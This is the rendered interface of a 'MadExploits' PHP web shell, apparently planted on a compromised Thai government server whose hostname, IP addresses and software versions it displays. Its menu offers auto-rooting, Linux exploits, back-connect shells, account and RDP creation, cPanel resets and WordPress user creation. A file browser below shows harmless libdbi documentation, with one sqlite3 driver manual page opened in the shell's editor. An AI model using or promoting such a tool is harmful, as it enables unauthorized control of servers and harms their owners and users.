Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libdbi-drivers-0.8.3 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
1.16
KB
-rw-r--r--
COPYING
25.91
KB
-rwxr-xr-x
ChangeLog
4.43
KB
-rw-r--r--
README
2.66
KB
-rw-r--r--
c102.html
3.74
KB
-rw-r--r--
c120.html
2.4
KB
-rw-r--r--
c128.html
2.41
KB
-rw-r--r--
c168.html
2.21
KB
-rw-r--r--
c173.html
2.21
KB
-rw-r--r--
c26.html
3.17
KB
-rw-r--r--
c34.html
3.17
KB
-rw-r--r--
c35.html
2.14
KB
-rw-r--r--
c39.html
2.1
KB
-rw-r--r--
c40.html
2.14
KB
-rw-r--r--
c44.html
2.11
KB
-rw-r--r--
c47.html
2.1
KB
-rw-r--r--
c93.html
5.54
KB
-rw-r--r--
c94.html
3.74
KB
-rw-r--r--
c98.html
5.54
KB
-rw-r--r--
copying-fdl.html
21.12
KB
-rw-r--r--
dbd_mysql.pdf
156.92
KB
-rw-r--r--
dbd_pgsql.pdf
149.71
KB
-rw-r--r--
dbd_sqlite3.pdf
185.88
KB
-rw-r--r--
f15.html
2.96
KB
-rw-r--r--
f23.html
2.96
KB
-rw-r--r--
f24.html
2.96
KB
-rw-r--r--
f29.html
2.96
KB
-rw-r--r--
f30.html
2.87
KB
-rw-r--r--
index.html
3.24
KB
-rw-r--r--
install-build.html
5.03
KB
-rw-r--r--
install-prereq.html
3.1
KB
-rw-r--r--
install.html
2.17
KB
-rw-r--r--
intro.html
2.49
KB
-rw-r--r--
options.html
3.86
KB
-rw-r--r--
specific.html
2.52
KB
-rw-r--r--
x123.html
7.47
KB
-rw-r--r--
x131.html
7.47
KB
-rw-r--r--
x171.html
2.3
KB
-rw-r--r--
x176.html
2.49
KB
-rw-r--r--
x195.html
5.29
KB
-rw-r--r--
x203.html
5.48
KB
-rw-r--r--
x42.html
2.72
KB
-rw-r--r--
x47.html
2.81
KB
-rw-r--r--
x50.html
2.72
KB
-rw-r--r--
x56.html
5.17
KB
-rw-r--r--
x61.html
5.05
KB
-rw-r--r--
x64.html
5.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : c34.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML ><HEAD ><TITLE >Introduction</TITLE ><META NAME="GENERATOR" CONTENT="Modular DocBook HTML Stylesheet Version 1.79"><LINK REL="HOME" TITLE="sqlite3 driver manual" HREF="index.html"><LINK REL="PREVIOUS" TITLE="Preface" HREF="f23.html"><LINK REL="NEXT" TITLE="Installation" HREF="c47.html"></HEAD ><BODY CLASS="CHAPTER" BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#840084" ALINK="#0000FF" ><DIV CLASS="NAVHEADER" ><TABLE SUMMARY="Header navigation table" WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" ><TR ><TH COLSPAN="3" ALIGN="center" >sqlite3 driver manual: A libdbi driver using the SQLite3 embedded database engine</TH ></TR ><TR ><TD WIDTH="10%" ALIGN="left" VALIGN="bottom" ><A HREF="f23.html" ACCESSKEY="P" >Prev</A ></TD ><TD WIDTH="80%" ALIGN="center" VALIGN="bottom" ></TD ><TD WIDTH="10%" ALIGN="right" VALIGN="bottom" ><A HREF="c47.html" ACCESSKEY="N" >Next</A ></TD ></TR ></TABLE ><HR ALIGN="LEFT" WIDTH="100%"></DIV ><DIV CLASS="CHAPTER" ><H1 ><A NAME="AEN34" ></A >Chapter 1. Introduction</H1 ><P ><A HREF="http://www.sqlite.org" TARGET="_top" >SQLite</A > is a smart library that implements an embeddable SQL database engine. No need for an external database server - an application linked against libsqlite can do it all by itself. Of course there are a few limitations of this approach compared to "real" SQL database servers, mostly for massively parallel high-throughput database applications, but on the other hand, installation and administration are a breeze.</P ><P >SQLite3 is a redesign of SQLite which is incompatible with the older 2.x versions. As the API functions and the library itself were renamed, SQLite3 also requires a slightly modified libdbi driver. You can have both the sqlite and the sqlite3 driver installed on your system, but you have to make sure that you access your databases with the driver that matches the database version. The easiest way to accomplish this is to use different database directories for each version.</P ><P >Your application should support the sqlite3 driver if one of the following applies:</P ><P ></P ><UL ><LI ><P >You want to support potential users of your application who don't have the skills to administer a database server.</P ></LI ><LI ><P >You want to offer the simplest possible installation of your application.</P ></LI ><LI ><P >You want to let users test-drive your application without the need to fiddle with their production database servers.</P ></LI ></UL ></DIV ><DIV CLASS="NAVFOOTER" ><HR ALIGN="LEFT" WIDTH="100%"><TABLE SUMMARY="Footer navigation table" WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" ><TR ><TD WIDTH="33%" ALIGN="left" VALIGN="top" ><A HREF="f23.html" ACCESSKEY="P" >Prev</A ></TD ><TD WIDTH="34%" ALIGN="center" VALIGN="top" ><A HREF="index.html" ACCESSKEY="H" >Home</A ></TD ><TD WIDTH="33%" ALIGN="right" VALIGN="top" ><A HREF="c47.html" ACCESSKEY="N" >Next</A ></TD ></TR ><TR ><TD WIDTH="33%" ALIGN="left" VALIGN="top" >Preface</TD ><TD WIDTH="34%" ALIGN="center" VALIGN="top" > </TD ><TD WIDTH="33%" ALIGN="right" VALIGN="top" >Installation</TD ></TR ></TABLE ></DIV ></BODY ></HTML >
Close